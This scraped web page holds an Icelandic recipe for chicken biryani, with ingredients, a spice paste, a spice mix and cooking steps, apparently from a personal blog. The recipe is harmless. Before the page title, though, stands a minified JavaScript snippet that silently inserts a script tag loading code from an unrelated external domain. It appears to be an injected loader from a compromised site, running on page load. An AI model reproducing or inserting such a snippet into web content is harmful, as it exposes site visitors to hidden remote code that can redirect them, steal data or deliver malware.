;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kjúklinga biryani – Eydís — Ljósmyndun

Kjúklinga biryani

Nægir 4
undirbúningur 30 mín +30 mín í marineringu
Eldunartími 50-60 mín

8 kjúklingaleggir
175 gr smjör eða olía
25 gr möndlur,saxaðar
25 gr kasjúhnetur,saxaðar
1 stór laukur,fínsaxaður
4 lárviðarlauf
425 gr löng hrísgrjón
900 ml sjóðandi vatn og salt
1/2 tsk saffran þræðir
2 msk bráðið smjör
1 rauður chili og ferskt kóríander til skrauts

Kryddmauk
1 tsk garama masala
1 lítill laukur, saxaður
5 hvítlauksrif,pressuð
10 sm ferskur engifer
150 ml hrein jógúrtz
1 tsk salt

Biriyani krydd
4 negulnaglar (cloves)
8 svört piparkorn
4 grænar kardimommur
1 svört kardimomma, kramin
5 sm kanilstöng
1/2 tsk turmerik

Blandið öllu hráefninu í kryddmaukinu saman í mortéli eða moulinex til að fá mjúkt mauk. Nuddið maukinu yfir kjúklingaleggina og látið þá marinerast í 30 mín.

Hitið olíu á pönnu og ristið hnetur og möndlur þar til þær gyllast. Fjarlægið og setjið á eldhúspappír.

Setjið laukinn á pönnuna. Blandið saman Biriyani kryddunum. Bætið þeim ásamt lárviðarlaufunum við laukinn á pönnunni, hrærið vel saman og bætið svo kjúklingnum út á. Eldið við meðalhita
í 20 mín. Bætið þá hrísgrjónunum saman við, vatninu og salti. Setjið lokið á og eldið í 15-20 mín eða þar til hrísgrjónin eru orðin tilbúin og allt vatnið horfið.

Ef þú vilt nota saffranið þá seturðu það í örlítið soðið vatn í 5 mín. Og hellir yfir bráðið smjörið og blandar saman við hrísgrjónin.

Setjið á fat eða diska og skreytið með hnetunum, ferskum rauðum chili og kóríanderlaufum.

Leave a Reply

Your email address will not be published. Required fields are marked *